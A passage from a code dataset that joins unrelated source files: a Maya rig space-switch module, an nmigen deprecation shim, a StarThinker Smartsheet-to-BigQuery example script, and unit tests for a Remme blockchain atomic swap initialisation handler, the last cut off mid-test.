spaceswitch.switch_space(pole_vector_control, "space", 1, create_keys=False)
"""
import maya.cmds as cmds
import maya.api.OpenMaya as OpenMaya
from cmt.dge import dge
import cmt.rig.common as common
import cmt.shortcuts as shortcuts
def create_space_switch(
node, drivers, switch_attribute=None, use_translate=True, use_rotate=True
):
"""Creates a space switch network.
The network uses the offsetParentMatrix attribute and does not create any
constraints or new dag nodes.
:param node: Transform to drive
:param drivers: List of tuples: [(driver1, "spaceName1"), (driver2, "spaceName2")]
    :param switch_attribute: Name of the switch attribute to create on the target node.
    :param use_translate: Default value of the generated translate toggle attribute.
    :param use_rotate: Default value of the generated rotate toggle attribute.
"""
if switch_attribute is None:
switch_attribute = "space"
if cmds.objExists("{}.{}".format(node, switch_attribute)):
cmds.deleteAttr(node, at=switch_attribute)
names = [d[1] for d in drivers]
cmds.addAttr(node, ln=switch_attribute, at="enum", en=":".join(names), keyable=True)
# Create attribute to toggle translation in the matrices
enable_translate_attr = _create_bool_attribute(
node, "{}UseTranslate".format(switch_attribute), use_translate
)
# Create attribute to toggle rotation in the matrices
enable_rotate_attr = _create_bool_attribute(
node, "{}UseRotate".format(switch_attribute), use_rotate
)
blend = cmds.createNode("blendMatrix", name="{}_spaceswitch".format(node))
# Get the current offset parent matrix. This is used as the starting blend point
m = OpenMaya.MMatrix(cmds.getAttr("{}.offsetParentMatrix".format(node)))
cmds.setAttr("{}.inputMatrix".format(blend), list(m), type="matrix")
parent = cmds.listRelatives(node, parent=True, path=True)
to_parent_local = "{}.worldInverseMatrix[0]".format(parent[0]) if parent else None
for i, driver in enumerate(drivers):
driver = driver[0]
_connect_driver_matrix_network(blend, node, driver, i, to_parent_local)
target_attr = "{}.target[{}]".format(blend, i)
# Hook up the weight toggle when switching spaces
dge(
"x = switch == {} ? 1 : 0".format(i),
x="{}.weight".format(target_attr),
switch="{}.{}".format(node, switch_attribute),
)
# Connect the translation, rotation toggles
cmds.connectAttr(enable_translate_attr, "{}.useTranslate".format(target_attr))
        cmds.connectAttr(enable_rotate_attr, "{}.useRotate".format(target_attr))
cmds.connectAttr(
"{}.outputMatrix".format(blend), "{}.offsetParentMatrix".format(node)
)
def _create_bool_attribute(node, attribute, default_value):
cmds.addAttr(
node, ln=attribute, at="bool", defaultValue=default_value, keyable=True
)
return "{}.{}".format(node, attribute)
def _connect_driver_matrix_network(blend, node, driver, index, to_parent_local):
# The multMatrix node will calculate the transformation to blend to when driven
# by this driver transform
mult = cmds.createNode(
"multMatrix", name="spaceswitch_{}_to_{}".format(node, driver)
)
offset = (
shortcuts.get_dag_path2(node).exclusiveMatrix()
* OpenMaya.MMatrix(cmds.getAttr("{}.worldInverseMatrix[0]".format(driver)))
)
cmds.setAttr("{}.matrixIn[0]".format(mult), list(offset), type="matrix")
cmds.connectAttr("{}.worldMatrix[0]".format(driver), "{}.matrixIn[1]".format(mult))
if to_parent_local:
cmds.connectAttr(to_parent_local, "{}.matrixIn[2]".format(mult))
cmds.connectAttr(
"{}.matrixSum".format(mult), "{}.target[{}].targetMatrix".format(blend, index)
)
def switch_space(node, attribute, space, create_keys=False):
"""Seamlessly switch between spaces
:param node: Node to switch
:param attribute: Space switching attribute on node
:param space: Space index in the space attribute
:param create_keys: True to create switching keys
"""
m = cmds.xform(node, q=True, ws=True, m=True)
cmds.setAttr("{}.{}".format(node, attribute), space)
cmds.xform(node, ws=True, m=m)
|
nmigen/hdl/mem.py | psumesh/nmigen | 528 | 12749228 | from amaranth.hdl.mem import *
from amaranth.hdl.mem import __all__
import warnings
warnings.warn("instead of nmigen.hdl.mem, use amaranth.hdl.mem",
DeprecationWarning, stacklevel=2)
|
examples/smartsheet_report_to_bigquery_example.py | Ressmann/starthinker | 138 | 12749270 |
###########################################################################
#
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
###########################################################################
#
# This code generated (see scripts folder for possible source):
# - Command: "python starthinker_ui/manage.py example"
#
###########################################################################
import argparse
import textwrap
from starthinker.util.configuration import Configuration
from starthinker.task.smartsheet.run import smartsheet
def recipe_smartsheet_report_to_bigquery(config, auth_read, auth_write, token, report, dataset, table, schema):
"""Move report data into a BigQuery table.
Args:
auth_read (authentication) - Credentials used for reading data.
auth_write (authentication) - Credentials used for writing data.
token (string) - Retrieve from SmartSheet account settings.
report (string) - Retrieve from report properties.
dataset (string) - Existing BigQuery dataset.
table (string) - Table to create from this report.
schema (json) - Schema provided in JSON list format or leave empty to auto detect.
"""
smartsheet(config, {
'auth':auth_read,
'token':token,
'report':report,
'out':{
'bigquery':{
'auth':auth_write,
'dataset':dataset,
'table':table,
'schema':schema
}
}
})
if __name__ == "__main__":
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description=textwrap.dedent("""
Move report data into a BigQuery table.
1. Specify <a href='https://smartsheet-platform.github.io/api-docs/' target='_blank'>SmartSheet Report</a> token.
2. Locate the ID of a report by viewing its properties.
3. Provide a BigQuery dataset ( must exist ) and table to write the data into.
4. StarThinker will automatically map the correct schema.
"""))
parser.add_argument("-project", help="Cloud ID of Google Cloud Project.", default=None)
parser.add_argument("-key", help="API Key of Google Cloud Project.", default=None)
parser.add_argument("-client", help="Path to CLIENT credentials json file.", default=None)
parser.add_argument("-user", help="Path to USER credentials json file.", default=None)
parser.add_argument("-service", help="Path to SERVICE credentials json file.", default=None)
parser.add_argument("-verbose", help="Print all the steps as they happen.", action="store_true")
parser.add_argument("-auth_read", help="Credentials used for reading data.", default='user')
parser.add_argument("-auth_write", help="Credentials used for writing data.", default='service')
parser.add_argument("-token", help="Retrieve from SmartSheet account settings.", default='')
parser.add_argument("-report", help="Retrieve from report properties.", default=None)
parser.add_argument("-dataset", help="Existing BigQuery dataset.", default='')
parser.add_argument("-table", help="Table to create from this report.", default='')
parser.add_argument("-schema", help="Schema provided in JSON list format or leave empty to auto detect.", default=None)
args = parser.parse_args()
config = Configuration(
project=args.project,
user=args.user,
service=args.service,
client=args.client,
key=args.key,
verbose=args.verbose
)
recipe_smartsheet_report_to_bigquery(config, args.auth_read, args.auth_write, args.token, args.report, args.dataset, args.table, args.schema)
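# Illustrative programmatic invocation (all values below are placeholders /
# assumptions, not real credentials or report IDs):
#
#   config = Configuration(user='user.json', service='service.json', verbose=True)
#   recipe_smartsheet_report_to_bigquery(
#       config, 'user', 'service',
#       token='SMARTSHEET_TOKEN', report='1234567890123456',
#       dataset='my_dataset', table='smartsheet_report', schema=None,
#   )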
|
testing/unit/tp/atomic_swap/test_init.py | FerrySchuller/remme-core | 129 | 12749301 | """
Provide tests for atomic swap handler initialization method implementation.
"""
import datetime
import time
import pytest
from sawtooth_sdk.processor.exceptions import InvalidTransaction
from sawtooth_sdk.protobuf.processor_pb2 import TpProcessRequest
from sawtooth_sdk.protobuf.setting_pb2 import Setting
from sawtooth_sdk.protobuf.transaction_pb2 import (
Transaction,
TransactionHeader,
)
from testing.conftest import create_signer
from testing.mocks.stub import StubContext
from testing.utils.client import proto_error_msg
from remme.clients.block_info import (
CONFIG_ADDRESS,
BlockInfoClient,
)
from remme.protos.account_pb2 import Account
from remme.protos.atomic_swap_pb2 import (
AtomicSwapInfo,
AtomicSwapInitPayload,
AtomicSwapMethod,
)
from remme.protos.block_info_pb2 import BlockInfo, BlockInfoConfig
from remme.protos.transaction_pb2 import TransactionPayload
from remme.shared.utils import hash512
from remme.settings import (
SETTINGS_KEY_ZERO_ADDRESS_OWNERS,
SETTINGS_SWAP_COMMISSION,
ZERO_ADDRESS,
)
from remme.settings.helper import _make_settings_key
from remme.tp.atomic_swap import AtomicSwapHandler
from remme.tp.basic import BasicHandler
TOKENS_AMOUNT_TO_SWAP = 200
SWAP_COMMISSION_AMOUNT = 100
BOT_ETHEREUM_ADDRESS = '0xe6ca0e7c974f06471759e9a05d18b538c5ced11e'
BOT_PRIVATE_KEY = '<KEY>'
BOT_PUBLIC_KEY = '03ecc5cb4094eb05319be6c7a63ebf17133d4ffaea48cdcfd1d5fc79dac7db7b6b'
BOT_ADDRESS = '112007b9433e1da5c624ff926477141abedfd57585a36590b0a8edc4104ef28093ee30'
ALICE_ETHEREUM_ADDRESS = '0x8dfe0f55a1cf9b22b8c85a9ff7a85a28a3879f71'
ALICE_ADDRESS = '112007db8a00c010402e2e3a7d03491323e761e0ea612481c518605648ceeb5ed454f7'
ALICE_EMAIL_ADDRESS_ENCRYPTED_BY_INITIATOR = '0x6f4d5666332f5a575a714d4245624455612f2b4345424f704b4256704f5'
BOT_IT_IS_INITIATOR_MARK = ''
SWAP_ID = '033102e41346242476b15a3a7966eb5249271025fc7fb0b37ed3fdb4bcce3884'
ADDRESS_TO_GET_SWAP_COMMISSION_AMOUNT_BY = _make_settings_key(SETTINGS_SWAP_COMMISSION)
ADDRESS_TO_GET_GENESIS_MEMBERS_AS_STRING_BY = _make_settings_key(SETTINGS_KEY_ZERO_ADDRESS_OWNERS)
ADDRESS_TO_STORE_SWAP_INFO_BY = BasicHandler(
name=AtomicSwapHandler().family_name, versions=AtomicSwapHandler()._family_versions[0]
).make_address_from_data(data=SWAP_ID)
TRANSACTION_REQUEST_ACCOUNT_HANDLER_PARAMS = {
'family_name': AtomicSwapHandler().family_name,
'family_version': AtomicSwapHandler()._family_versions[0],
}
RANDOM_NODE_PUBLIC_KEY = '<KEY>'
RANDOM_PUBLIC_KEY = '<KEY>'
CURRENT_TIMESTAMP = int(datetime.datetime.now().timestamp())
BLOCK_INFO_CONFIG_ADDRESS = CONFIG_ADDRESS
BLOCK_INFO_ADDRESS = BlockInfoClient.create_block_address(1000)
block_info_config = BlockInfoConfig()
block_info_config.latest_block = 1000
SERIALIZED_BLOCK_INFO_CONFIG = block_info_config.SerializeToString()
block_info = BlockInfo()
block_info.timestamp = CURRENT_TIMESTAMP
SERIALIZED_BLOCK_INFO = block_info.SerializeToString()
INPUTS = [
ADDRESS_TO_GET_SWAP_COMMISSION_AMOUNT_BY,
BLOCK_INFO_CONFIG_ADDRESS,
BLOCK_INFO_ADDRESS,
BOT_ADDRESS,
ZERO_ADDRESS,
ADDRESS_TO_STORE_SWAP_INFO_BY,
]
OUTPUTS = [
ADDRESS_TO_STORE_SWAP_INFO_BY,
ZERO_ADDRESS,
BOT_ADDRESS,
]
def test_atomic_swap_init_with_empty_proto():
"""
Case: send empty proto for init
Expect: invalid transaction error
"""
inputs = outputs = [
ADDRESS_TO_GET_SWAP_COMMISSION_AMOUNT_BY,
BLOCK_INFO_CONFIG_ADDRESS,
BLOCK_INFO_ADDRESS,
BOT_ADDRESS,
ZERO_ADDRESS,
ADDRESS_TO_STORE_SWAP_INFO_BY,
ADDRESS_TO_GET_GENESIS_MEMBERS_AS_STRING_BY,
]
atomic_swap_init_payload = AtomicSwapInitPayload()
transaction_payload = TransactionPayload()
transaction_payload.method = AtomicSwapMethod.INIT
transaction_payload.data = atomic_swap_init_payload.SerializeToString()
serialized_transaction_payload = transaction_payload.SerializeToString()
transaction_header = TransactionHeader(
signer_public_key=BOT_PUBLIC_KEY,
family_name=TRANSACTION_REQUEST_ACCOUNT_HANDLER_PARAMS.get('family_name'),
family_version=TRANSACTION_REQUEST_ACCOUNT_HANDLER_PARAMS.get('family_version'),
inputs=inputs,
outputs=outputs,
dependencies=[],
payload_sha512=hash512(data=serialized_transaction_payload),
batcher_public_key=RANDOM_NODE_PUBLIC_KEY,
nonce=time.time().hex().encode(),
)
serialized_header = transaction_header.SerializeToString()
transaction_request = TpProcessRequest(
header=transaction_header,
payload=serialized_transaction_payload,
signature=create_signer(private_key=BOT_PRIVATE_KEY).sign(serialized_header),
)
mock_context = StubContext(inputs=inputs, outputs=outputs, initial_state={})
with pytest.raises(InvalidTransaction) as error:
AtomicSwapHandler().apply(transaction=transaction_request, context=mock_context)
assert proto_error_msg(
AtomicSwapInitPayload,
{
'receiver_address': ['Missed address'],
'sender_address_non_local': ['This field is required.'],
'amount': ['This field is required.'],
'swap_id': ['Missed swap_id'],
'created_at': ['This field is required.'],
}
) == str(error.value)
def test_atomic_swap_init():
"""
Case: initialize swap of bot's Remme node tokens to Alice's ERC20 Remme tokens.
    Expect: the bot sends the commission to the zero account address, and the swap amount is deducted from the bot account.
"""
atomic_swap_init_payload = AtomicSwapInitPayload(
receiver_address=ALICE_ADDRESS,
sender_address_non_local=BOT_ETHEREUM_ADDRESS,
amount=TOKENS_AMOUNT_TO_SWAP,
swap_id=SWAP_ID,
secret_lock_by_solicitor=BOT_IT_IS_INITIATOR_MARK,
email_address_encrypted_by_initiator=ALICE_EMAIL_ADDRESS_ENCRYPTED_BY_INITIATOR,
created_at=CURRENT_TIMESTAMP,
)
transaction_payload = TransactionPayload()
transaction_payload.method = AtomicSwapMethod.INIT
transaction_payload.data = atomic_swap_init_payload.SerializeToString()
serialized_transaction_payload = transaction_payload.SerializeToString()
transaction_header = TransactionHeader(
signer_public_key=BOT_PUBLIC_KEY,
family_name=TRANSACTION_REQUEST_ACCOUNT_HANDLER_PARAMS.get('family_name'),
family_version=TRANSACTION_REQUEST_ACCOUNT_HANDLER_PARAMS.get('family_version'),
inputs=INPUTS,
outputs=OUTPUTS,
dependencies=[],
payload_sha512=hash512(data=serialized_transaction_payload),
batcher_public_key=RANDOM_NODE_PUBLIC_KEY,
nonce=time.time().hex().encode(),
)
serialized_header = transaction_header.SerializeToString()
transaction_request = TpProcessRequest(
header=transaction_header,
payload=serialized_transaction_payload,
signature=create_signer(private_key=BOT_PRIVATE_KEY).sign(serialized_header),
)
bot_account = Account()
bot_account.balance = 5000
serialized_bot_account = bot_account.SerializeToString()
zero_account = Account()
zero_account.balance = 0
serialized_zero_account = zero_account.SerializeToString()
swap_commission_setting = Setting()
swap_commission_setting.entries.add(key=SETTINGS_SWAP_COMMISSION, value=str(SWAP_COMMISSION_AMOUNT))
serialized_swap_commission_setting = swap_commission_setting.SerializeToString()
genesis_members_setting = Setting()
genesis_members_setting.entries.add(key=SETTINGS_KEY_ZERO_ADDRESS_OWNERS, value=f'{BOT_PUBLIC_KEY},')
serialized_genesis_members_setting = genesis_members_setting.SerializeToString()
mock_context = StubContext(inputs=INPUTS, outputs=OUTPUTS, initial_state={
BLOCK_INFO_CONFIG_ADDRESS: SERIALIZED_BLOCK_INFO_CONFIG,
BLOCK_INFO_ADDRESS: SERIALIZED_BLOCK_INFO,
BOT_ADDRESS: serialized_bot_account,
ZERO_ADDRESS: serialized_zero_account,
ADDRESS_TO_GET_SWAP_COMMISSION_AMOUNT_BY: serialized_swap_commission_setting,
ADDRESS_TO_GET_GENESIS_MEMBERS_AS_STRING_BY: serialized_genesis_members_setting,
})
swap_info = AtomicSwapInfo()
swap_info.swap_id = SWAP_ID
swap_info.state = AtomicSwapInfo.OPENED
swap_info.amount = TOKENS_AMOUNT_TO_SWAP
swap_info.created_at = CURRENT_TIMESTAMP
swap_info.email_address_encrypted_optional = ALICE_EMAIL_ADDRESS_ENCRYPTED_BY_INITIATOR
swap_info.sender_address = BOT_ADDRESS
swap_info.sender_address_non_local = BOT_ETHEREUM_ADDRESS
swap_info.receiver_address = ALICE_ADDRESS
swap_info.is_initiator = True
serialized_swap_info = swap_info.SerializeToString()
expected_bot_account = Account()
expected_bot_account.balance = 5000 - TOKENS_AMOUNT_TO_SWAP - SWAP_COMMISSION_AMOUNT
serialized_expected_bot_account = expected_bot_account.SerializeToString()
expected_zero_account = Account()
expected_zero_account.balance = SWAP_COMMISSION_AMOUNT
serialized_expected_zero_account = expected_zero_account.SerializeToString()
expected_state = {
BOT_ADDRESS: serialized_expected_bot_account,
ZERO_ADDRESS: serialized_expected_zero_account,
ADDRESS_TO_STORE_SWAP_INFO_BY: serialized_swap_info,
}
AtomicSwapHandler().apply(transaction=transaction_request, context=mock_context)
state_as_list = mock_context.get_state(addresses=[
ADDRESS_TO_STORE_SWAP_INFO_BY, BOT_ADDRESS, ZERO_ADDRESS,
])
state_as_dict = {entry.address: entry.data for entry in state_as_list}
assert expected_state == state_as_dict
def test_atomic_swap_init_already_taken_id():
"""
    Case: initialize swap of bot's Remme node tokens to Alice's ERC20 Remme tokens with an already existing swap id.
    Expect: invalid transaction error is raised with an atomic swap ID has already been taken error message.
"""
atomic_swap_init_payload = AtomicSwapInitPayload(
receiver_address=ALICE_ADDRESS,
sender_address_non_local=BOT_ETHEREUM_ADDRESS,
amount=TOKENS_AMOUNT_TO_SWAP,
swap_id=SWAP_ID,
secret_lock_by_solicitor=BOT_IT_IS_INITIATOR_MARK,
email_address_encrypted_by_initiator=ALICE_EMAIL_ADDRESS_ENCRYPTED_BY_INITIATOR,
created_at=CURRENT_TIMESTAMP,
)
transaction_payload = TransactionPayload()
transaction_payload.method = AtomicSwapMethod.INIT
transaction_payload.data = atomic_swap_init_payload.SerializeToString()
serialized_transaction_payload = transaction_payload.SerializeToString()
transaction_header = TransactionHeader(
signer_public_key=BOT_PUBLIC_KEY,
family_name=TRANSACTION_REQUEST_ACCOUNT_HANDLER_PARAMS.get('family_name'),
family_version=TRANSACTION_REQUEST_ACCOUNT_HANDLER_PARAMS.get('family_version'),
inputs=INPUTS,
outputs=OUTPUTS,
dependencies=[],
payload_sha512=hash512(data=serialized_transaction_payload),
batcher_public_key=RANDOM_NODE_PUBLIC_KEY,
nonce=time.time().hex().encode(),
)
serialized_header = transaction_header.SerializeToString()
transaction_request = TpProcessRequest(
header=transaction_header,
payload=serialized_transaction_payload,
signature=create_signer(private_key=BOT_PRIVATE_KEY).sign(serialized_header),
)
swap_info = AtomicSwapInfo()
swap_info.swap_id = SWAP_ID
swap_info.state = AtomicSwapInfo.OPENED
swap_info.amount = TOKENS_AMOUNT_TO_SWAP
swap_info.created_at = CURRENT_TIMESTAMP
swap_info.email_address_encrypted_optional = ALICE_EMAIL_ADDRESS_ENCRYPTED_BY_INITIATOR
swap_info.sender_address = BOT_ADDRESS
swap_info.sender_address_non_local = BOT_ETHEREUM_ADDRESS
swap_info.receiver_address = ALICE_ADDRESS
serialized_swap_info = swap_info.SerializeToString()
mock_context = StubContext(inputs=INPUTS, outputs=OUTPUTS, initial_state={
ADDRESS_TO_STORE_SWAP_INFO_BY: serialized_swap_info,
})
with pytest.raises(InvalidTransaction) as error:
AtomicSwapHandler().apply(transaction=transaction_request, context=mock_context)
assert 'Atomic swap ID has already been taken, please use a different one.' == str(error.value)
def test_atomic_swap_init_swap_no_block_config_info():
"""
    Case: initialize swap of bot's Remme node tokens to Alice's ERC20 Remme tokens when there is no block config setting.
    Expect: invalid transaction error is raised with a block config not found error message.
"""
atomic_swap_init_payload = AtomicSwapInitPayload(
receiver_address=ALICE_ADDRESS,
sender_address_non_local=BOT_ETHEREUM_ADDRESS,
amount=TOKENS_AMOUNT_TO_SWAP,
swap_id=SWAP_ID,
secret_lock_by_solicitor=BOT_IT_IS_INITIATOR_MARK,
email_address_encrypted_by_initiator=ALICE_EMAIL_ADDRESS_ENCRYPTED_BY_INITIATOR,
created_at=CURRENT_TIMESTAMP,
)
transaction_payload = TransactionPayload()
transaction_payload.method = AtomicSwapMethod.INIT
transaction_payload.data = atomic_swap_init_payload.SerializeToString()
serialized_transaction_payload = transaction_payload.SerializeToString()
transaction_header = TransactionHeader(
signer_public_key=BOT_PUBLIC_KEY,
family_name=TRANSACTION_REQUEST_ACCOUNT_HANDLER_PARAMS.get('family_name'),
family_version=TRANSACTION_REQUEST_ACCOUNT_HANDLER_PARAMS.get('family_version'),
inputs=INPUTS,
outputs=OUTPUTS,
dependencies=[],
payload_sha512=hash512(data=serialized_transaction_payload),
batcher_public_key=RANDOM_NODE_PUBLIC_KEY,
nonce=time.time().hex().encode(),
)
serialized_header = transaction_header.SerializeToString()
transaction_request = TpProcessRequest(
header=transaction_header,
payload=serialized_transaction_payload,
signature=create_signer(private_key=BOT_PRIVATE_KEY).sign(serialized_header),
)
mock_context = StubContext(inputs=INPUTS, outputs=OUTPUTS, initial_state={})
with pytest.raises(InvalidTransaction) as error:
AtomicSwapHandler().apply(transaction=transaction_request, context=mock_context)
assert 'Block config not found.' == str(error.value)
def test_atomic_swap_init_swap_no_block_info():
"""
    Case: initialize swap of bot's Remme node tokens to Alice's ERC20 Remme tokens when the needed block information is missing.
    Expect: invalid transaction error is raised with block not found error message.
"""
atomic_swap_init_payload = AtomicSwapInitPayload(
receiver_address=ALICE_ADDRESS,
sender_address_non_local=BOT_ETHEREUM_ADDRESS,
amount=TOKENS_AMOUNT_TO_SWAP,
swap_id=SWAP_ID,
secret_lock_by_solicitor=BOT_IT_IS_INITIATOR_MARK,
email_address_encrypted_by_initiator=ALICE_EMAIL_ADDRESS_ENCRYPTED_BY_INITIATOR,
created_at=CURRENT_TIMESTAMP,
)
transaction_payload = TransactionPayload()
transaction_payload.method = AtomicSwapMethod.INIT
transaction_payload.data = atomic_swap_init_payload.SerializeToString()
serialized_transaction_payload = transaction_payload.SerializeToString()
transaction_header = TransactionHeader(
signer_public_key=BOT_PUBLIC_KEY,
family_name=TRANSACTION_REQUEST_ACCOUNT_HANDLER_PARAMS.get('family_name'),
family_version=TRANSACTION_REQUEST_ACCOUNT_HANDLER_PARAMS.get('family_version'),
inputs=INPUTS,
outputs=OUTPUTS,
dependencies=[],
payload_sha512=hash512(data=serialized_transaction_payload),
batcher_public_key=RANDOM_NODE_PUBLIC_KEY,
nonce=time.time().hex().encode(),
)
serialized_header = transaction_header.SerializeToString()
transaction_request = TpProcessRequest(
header=transaction_header,
payload=serialized_transaction_payload,
signature=create_signer(private_key=BOT_PRIVATE_KEY).sign(serialized_header),
)
mock_context = StubContext(inputs=INPUTS, outputs=OUTPUTS, initial_state={
BLOCK_INFO_CONFIG_ADDRESS: SERIALIZED_BLOCK_INFO_CONFIG,
})
with pytest.raises(InvalidTransaction) as error:
AtomicSwapHandler().apply(transaction=transaction_request, context=mock_context)
assert f'Block {block_info_config.latest_block + 1} not found.' == str(error.value)
def test_atomic_swap_init_swap_receiver_address_invalid_type():
"""
Case: initialize swap of bot's Remme node tokens to Alice's ERC20 Remme tokens with invalid Alice node address.
    Expect: invalid transaction error is raised with address is not of a blockchain token type error message.
"""
invalid_receiver_address = '112934y*(J#QJ3UH*PD(:9B&TYDB*I0b0a8edc4104ef28093ee30'
atomic_swap_init_payload = AtomicSwapInitPayload(
receiver_address=invalid_receiver_address,
sender_address_non_local=BOT_ETHEREUM_ADDRESS,
amount=TOKENS_AMOUNT_TO_SWAP,
swap_id=SWAP_ID,
secret_lock_by_solicitor=BOT_IT_IS_INITIATOR_MARK,
email_address_encrypted_by_initiator=ALICE_EMAIL_ADDRESS_ENCRYPTED_BY_INITIATOR,
created_at=CURRENT_TIMESTAMP,
)
transaction_payload = TransactionPayload()
transaction_payload.method = AtomicSwapMethod.INIT
transaction_payload.data = atomic_swap_init_payload.SerializeToString()
serialized_transaction_payload = transaction_payload.SerializeToString()
transaction_header = TransactionHeader(
signer_public_key=BOT_PUBLIC_KEY,
family_name=TRANSACTION_REQUEST_ACCOUNT_HANDLER_PARAMS.get('family_name'),
family_version=TRANSACTION_REQUEST_ACCOUNT_HANDLER_PARAMS.get('family_version'),
inputs=INPUTS,
outputs=OUTPUTS,
dependencies=[],
payload_sha512=hash512(data=serialized_transaction_payload),
batcher_public_key=RANDOM_NODE_PUBLIC_KEY,
nonce=time.time().hex().encode(),
)
serialized_header = transaction_header.SerializeToString()
transaction_request = TpProcessRequest(
header=transaction_header,
payload=serialized_transaction_payload,
signature=create_signer(private_key=BOT_PRIVATE_KEY).sign(serialized_header),
)
mock_context = StubContext(inputs=INPUTS, outputs=OUTPUTS, initial_state={
BLOCK_INFO_CONFIG_ADDRESS: SERIALIZED_BLOCK_INFO_CONFIG,
BLOCK_INFO_ADDRESS: SERIALIZED_BLOCK_INFO,
})
with pytest.raises(InvalidTransaction) as error:
AtomicSwapHandler().apply(transaction=transaction_request, context=mock_context)
assert proto_error_msg(
AtomicSwapInitPayload,
{'receiver_address': ['Address is not of a blockchain token type.']}
) == str(error.value)
def test_atomic_swap_init_swap_wrong_commission_address():
"""
Case: initialize swap of bot's Remme node tokens to Alice's ERC20 Remme tokens with wrong commission settings.
Expect: invalid transaction error is raised with wrong commission address error message.
"""
atomic_swap_init_payload = AtomicSwapInitPayload(
receiver_address=ALICE_ADDRESS,
sender_address_non_local=BOT_ETHEREUM_ADDRESS,
amount=TOKENS_AMOUNT_TO_SWAP,
swap_id=SWAP_ID,
secret_lock_by_solicitor=BOT_IT_IS_INITIATOR_MARK,
email_address_encrypted_by_initiator=ALICE_EMAIL_ADDRESS_ENCRYPTED_BY_INITIATOR,
created_at=CURRENT_TIMESTAMP,
)
transaction_payload = TransactionPayload()
transaction_payload.method = AtomicSwapMethod.INIT
transaction_payload.data = atomic_swap_init_payload.SerializeToString()
serialized_transaction_payload = transaction_payload.SerializeToString()
transaction_header = TransactionHeader(
signer_public_key=BOT_PUBLIC_KEY,
family_name=TRANSACTION_REQUEST_ACCOUNT_HANDLER_PARAMS.get('family_name'),
family_version=TRANSACTION_REQUEST_ACCOUNT_HANDLER_PARAMS.get('family_version'),
inputs=INPUTS,
outputs=OUTPUTS,
dependencies=[],
payload_sha512=hash512(data=serialized_transaction_payload),
batcher_public_key=RANDOM_NODE_PUBLIC_KEY,
nonce=time.time().hex().encode(),
)
serialized_header = transaction_header.SerializeToString()
transaction_request = TpProcessRequest(
header=transaction_header,
payload=serialized_transaction_payload,
signature=create_signer(private_key=BOT_PRIVATE_KEY).sign(serialized_header),
)
swap_commission_setting = Setting()
swap_commission_setting.entries.add(key=SETTINGS_SWAP_COMMISSION, value='-1')
serialized_swap_commission_setting = swap_commission_setting.SerializeToString()
mock_context = StubContext(inputs=INPUTS, outputs=OUTPUTS, initial_state={
BLOCK_INFO_CONFIG_ADDRESS: SERIALIZED_BLOCK_INFO_CONFIG,
BLOCK_INFO_ADDRESS: SERIALIZED_BLOCK_INFO,
ADDRESS_TO_GET_SWAP_COMMISSION_AMOUNT_BY: serialized_swap_commission_setting,
})
with pytest.raises(InvalidTransaction) as error:
AtomicSwapHandler().apply(transaction=transaction_request, context=mock_context)
assert 'Wrong commission address.' == str(error.value)
def test_atomic_swap_init_swap_no_account_in_state():
"""
Case: initialize swap of bot's Remme node tokens to Alice's ERC20 Remme tokens from non-existent bot address.
Expect: invalid transaction error is raised with not enough balance error message.
"""
atomic_swap_init_payload = AtomicSwapInitPayload(
receiver_address=ALICE_ADDRESS,
sender_address_non_local=BOT_ETHEREUM_ADDRESS,
amount=TOKENS_AMOUNT_TO_SWAP,
swap_id=SWAP_ID,
secret_lock_by_solicitor=BOT_IT_IS_INITIATOR_MARK,
email_address_encrypted_by_initiator=ALICE_EMAIL_ADDRESS_ENCRYPTED_BY_INITIATOR,
created_at=CURRENT_TIMESTAMP,
)
transaction_payload = TransactionPayload()
transaction_payload.method = AtomicSwapMethod.INIT
transaction_payload.data = atomic_swap_init_payload.SerializeToString()
serialized_transaction_payload = transaction_payload.SerializeToString()
transaction_header = TransactionHeader(
signer_public_key=BOT_PUBLIC_KEY,
family_name=TRANSACTION_REQUEST_ACCOUNT_HANDLER_PARAMS.get('family_name'),
family_version=TRANSACTION_REQUEST_ACCOUNT_HANDLER_PARAMS.get('family_version'),
inputs=INPUTS,
outputs=OUTPUTS,
dependencies=[],
payload_sha512=hash512(data=serialized_transaction_payload),
batcher_public_key=RANDOM_NODE_PUBLIC_KEY,
nonce=time.time().hex().encode(),
)
serialized_header = transaction_header.SerializeToString()
transaction_request = TpProcessRequest(
header=transaction_header,
payload=serialized_transaction_payload,
signature=create_signer(private_key=BOT_PRIVATE_KEY).sign(serialized_header),
)
swap_commission_setting = Setting()
swap_commission_setting.entries.add(key=SETTINGS_SWAP_COMMISSION, value=str(SWAP_COMMISSION_AMOUNT))
serialized_swap_commission_setting = swap_commission_setting.SerializeToString()
mock_context = StubContext(inputs=INPUTS, outputs=OUTPUTS, initial_state={
BLOCK_INFO_CONFIG_ADDRESS: SERIALIZED_BLOCK_INFO_CONFIG,
BLOCK_INFO_ADDRESS: SERIALIZED_BLOCK_INFO,
ADDRESS_TO_GET_SWAP_COMMISSION_AMOUNT_BY: serialized_swap_commission_setting,
})
with pytest.raises(InvalidTransaction) as error:
AtomicSwapHandler().apply(transaction=transaction_request, context=mock_context)
total_amount = TOKENS_AMOUNT_TO_SWAP + SWAP_COMMISSION_AMOUNT
assert f'Not enough balance to perform the transaction in the amount (with a commission) {total_amount}.' \
== str(error.value)
def test_atomic_swap_init_swap_not_enough_balance():
"""
Case: initialize swap of bot's Remme node tokens to Alice's ERC20 Remme tokens with not enough bot address balance.
Expect: invalid transaction error is raised with not enough balance error message.
"""
atomic_swap_init_payload = AtomicSwapInitPayload(
receiver_address=ALICE_ADDRESS,
sender_address_non_local=BOT_ETHEREUM_ADDRESS,
amount=TOKENS_AMOUNT_TO_SWAP,
swap_id=SWAP_ID,
secret_lock_by_solicitor=BOT_IT_IS_INITIATOR_MARK,
email_address_encrypted_by_initiator=ALICE_EMAIL_ADDRESS_ENCRYPTED_BY_INITIATOR,
created_at=CURRENT_TIMESTAMP,
)
transaction_payload = TransactionPayload()
transaction_payload.method = AtomicSwapMethod.INIT
transaction_payload.data = atomic_swap_init_payload.SerializeToString()
serialized_transaction_payload = transaction_payload.SerializeToString()
transaction_header = TransactionHeader(
signer_public_key=BOT_PUBLIC_KEY,
family_name=TRANSACTION_REQUEST_ACCOUNT_HANDLER_PARAMS.get('family_name'),
